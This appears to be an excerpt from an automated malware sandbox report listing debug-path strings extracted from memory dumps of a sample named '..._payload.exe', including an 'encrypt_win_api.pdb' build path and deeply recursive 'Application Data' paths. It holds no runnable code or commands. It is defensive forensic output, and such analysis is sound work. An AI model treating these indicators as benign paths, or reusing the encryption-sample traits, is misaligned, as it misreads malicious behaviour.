              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2314093672.0000000003B5D000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2316169449.000000000333A000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2316398950.0000000003B5D000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2355137046.0000000003B9D000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2353303080.0000000003B30000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\be\* source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2017927846.0000000003301000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2046303739.0000000003302000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2046429413.0000000003321000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2046565289.0000000003327000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ata\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2276405605.00000000032F8000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2276474116.00000000032FC000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb.ppvw source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2251341144.000000000388F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\e\*\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2275071344.0000000003303000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2275036397.0000000003300000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2275912662.0000000003304000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2376983610.0000000003B78000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2381664053.0000000003B94000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2369942184.0000000003C21000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2366153323.0000000003C20000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2369942184.0000000003C21000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2362545370.0000000003C2C000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2366153323.0000000003C20000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2040839710.0000000003359000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2017927846.0000000003301000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2276510131.0000000003355000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2251695399.0000000003331000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2251649553.0000000003323000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2275508085.000000000334E000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2251738485.0000000003353000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2275299047.000000000334D000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2046220490.0000000003341000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2046303739.0000000003302000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2018734898.0000000003357000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2022014265.0000000003357000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2274611974.000000000331A000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2274989424.0000000003331000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2275835026.000000000334E000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2022446710.0000000003357000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2046429413.0000000003321000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000
              Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\*z source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2361547114.000000000397A000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2353656586.0000000003965000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2354799442.0000000003965000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2361373053.0000000003968000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2376983610.0000000003B78000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\bat\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2251695399.0000000003331000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2251649553.0000000003323000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2251527503.000000000331A000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2251806523.000000000333D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ow\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2306779341.0000000003956000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2307711721.0000000003966000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\che\n source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2367688022.0000000003B61000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\\*i source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2353921532.00000000038DE000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2314741527.00000000038DD000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2314800964.00000000038E8000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2354889761.00000000038E5000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.1957412867.0000000003770000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\X source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2316891166.0000000003B41000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2307527322.0000000003AF0000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2316398950.0000000003B28000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2306204411.0000000003AE1000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2315144576.0000000003B21000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2314093672.0000000003AF0000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2307814627.0000000003B11000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.errore\AppCache133408908224609935.txt\1 source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2251649553.0000000003323000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2251527503.000000000331A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\>; source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2314093672.0000000003B5D000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2307527322.0000000003B5D000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2316398950.0000000003B5D000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2306204411.0000000003B5D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ded\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2376983610.0000000003B78000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2381664053.0000000003B94000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2274518073.00000000037AA000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2274719064.00000000037C3000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2298200756.000000000383A000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2297158244.00000000037EE000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2297500931.0000000003829000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2299340114.0000000003840000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\65\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2376983610.0000000003B78000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2378718036.0000000003C19000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\* source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2251341144.000000000388F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2367688022.0000000003B61000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb.ppvw source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2251341144.000000000388F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: s\Application Data\Temp\Symbols\winload_prod.pdb\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2296597448.000000000331A000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2296040689.000000000330C000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2296967134.000000000333D000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2297919954.000000000335B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\y\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2298200756.000000000383A000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2275138437.000000000388F000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2314741527.00000000038DD000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2353832982.00000000038FB000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2307758471.00000000038E8000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2276086139.00000000038D0000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2314800964.00000000038E8000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2297158244.00000000037EE000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2297500931.0000000003829000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2314907836.00000000038EE000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2275446209.00000000038BC000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2306454387.00000000038CC000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2299485751.000000000388A000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2299340114.0000000003840000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2315942860.00000000038F8000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2307467722.00000000038D3000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2316633831.000000000395D000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2306779341.0000000003956000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2314963868.0000000003950000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2307711721.0000000003966000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2316109364.000000000395A000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2314653770.000000000394E000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2317124718.0000000003982000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\\\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2354476353.000000000333C000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2360571973.000000000333C000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2362367868.000000000333C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\:# source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2316169449.000000000333A000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2306029870.0000000003322000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2316249457.0000000003353000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2306348471.0000000003347000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error.ppvw source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2251341144.0000000003813000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\{FII source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2251341144.000000000388F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2015348604.0000000003331000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2017889756.0000000003336000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdbvb8IC source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2251341144.000000000388F000.00000004.00000020.00020000.00000000.sdmp
